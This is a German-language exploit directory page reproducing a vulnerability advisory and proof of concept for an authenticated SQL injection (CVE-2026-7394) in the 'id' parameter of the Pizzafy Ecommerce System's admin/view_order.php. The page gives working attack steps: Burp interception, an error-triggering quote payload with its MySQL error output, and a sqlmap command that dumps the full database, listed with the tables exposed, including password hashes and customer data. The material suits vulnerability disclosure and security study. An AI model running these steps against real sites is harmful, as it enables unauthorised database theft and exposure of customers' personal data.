Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-7394-SQLI | Kitploit
Tools/GitHubGitHub/xmyronn/cve-2026-7394-sqli
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsDatenbanksicherheit
GitHubxmyronn/cve-2026-7394-sqli

CVE-2026-7394-SQLI

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SQL-Injection im Pizzafy Ecommerce System — admin/view_order.php

Details

FeldWert
AnbieterSourceCodester
ProduktPizzafy Ecommerce System using PHP and MySQL
Version1.0
SchwachstelleSQL-Injection
CWECWE-89
CVSSv3-Score7.2 (Hoch)
AngriffsvektorNetzwerk
Authentifizierung erforderlichJa (Administrator)
ForscherXmyronn
Datum2026-04-11

https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html


Betroffene Komponente

Datei: Pizzafy/admin/view_order.php
Parameter: id (GET)


Beschreibung

Der Endpunkt admin/view_order.php im Pizzafy Ecommerce System 1.0 bereinigt den GET-Parameter id nicht ordnungsgemäß, bevor er an eine MySQL-Abfrage übergeben wird. Ein authentifizierter Administrator kann diesen Parameter manipulieren, um beliebiges SQL einzuschleusen, was zu einer vollständigen Kompromittierung der Datenbank führt.


Proof of Concept

Schritt 1 — Als Administrator anmelden

Navigieren Sie zu:

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php

Melden Sie sich mit Administrator-Anmeldedaten an.

Schritt 2 — Zu Bestellungen navigieren

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
Screenshot 2026-04-11 212106

Klicken Sie bei einem beliebigen Bestelleintrag auf View Order. Screenshot 2026-04-11 212116

Schritt 3 — Anfrage in Burp Suite abfangen

Die abgefangene GET-Anfrage sieht wie folgt aus: Screenshot 2026-04-11 212135

Schritt 4 — SQL-Fehler auslösen

Ändern Sie id=1 zu id=': Screenshot 2026-04-11 212145

root@kitploit:~
GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1

Antwort — MySQL-Fehler offengelegt:

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15

Schritt 5 — Mit sqlmap ausnutzen

Speichern Sie die Anfrage in view_order.txt und führen Sie aus:

root@kitploit:~
sqlmap -r view_order.txt --dump --batch
Screenshot 2026-04-11 212406

sqlmap bestätigte Injection-Typen:

TypTitel
Boolesch-basiert (blind)AND boolean-based blind — WHERE-Klausel
FehlerbasiertMySQL >= 5.0 FLOOR-Fehler
Zeitbasiert (blind)MySQL >= 5.0.12 SLEEP
UNION-AbfrageGenerische UNION-Abfrage — 11 Spalten

Vollständige Datenbank ausgelesen:

root@kitploit:~
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings

Offengelegte sensible Daten umfassen bcrypt-Passwort-Hashes, Kunden-E-Mails, Bestelldetails und Systemkonfiguration.


Auswirkungen

Ein böswilliger authentifizierter Administrator (oder ein Angreifer, der Administrator-Anmeldedaten erlangt hat) kann:

  • Die vollständige Datenbank inklusive Passwort-Hashes auslesen
  • Sensible Kundendaten (PII) einsehen (Namen, E-Mails, Adressen, Telefonnummern)
  • Möglicherweise in die Datenbank schreiben

Referenzen

  • SourceCodester — Pizzafy Ecommerce System
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command.
Tool herunterladen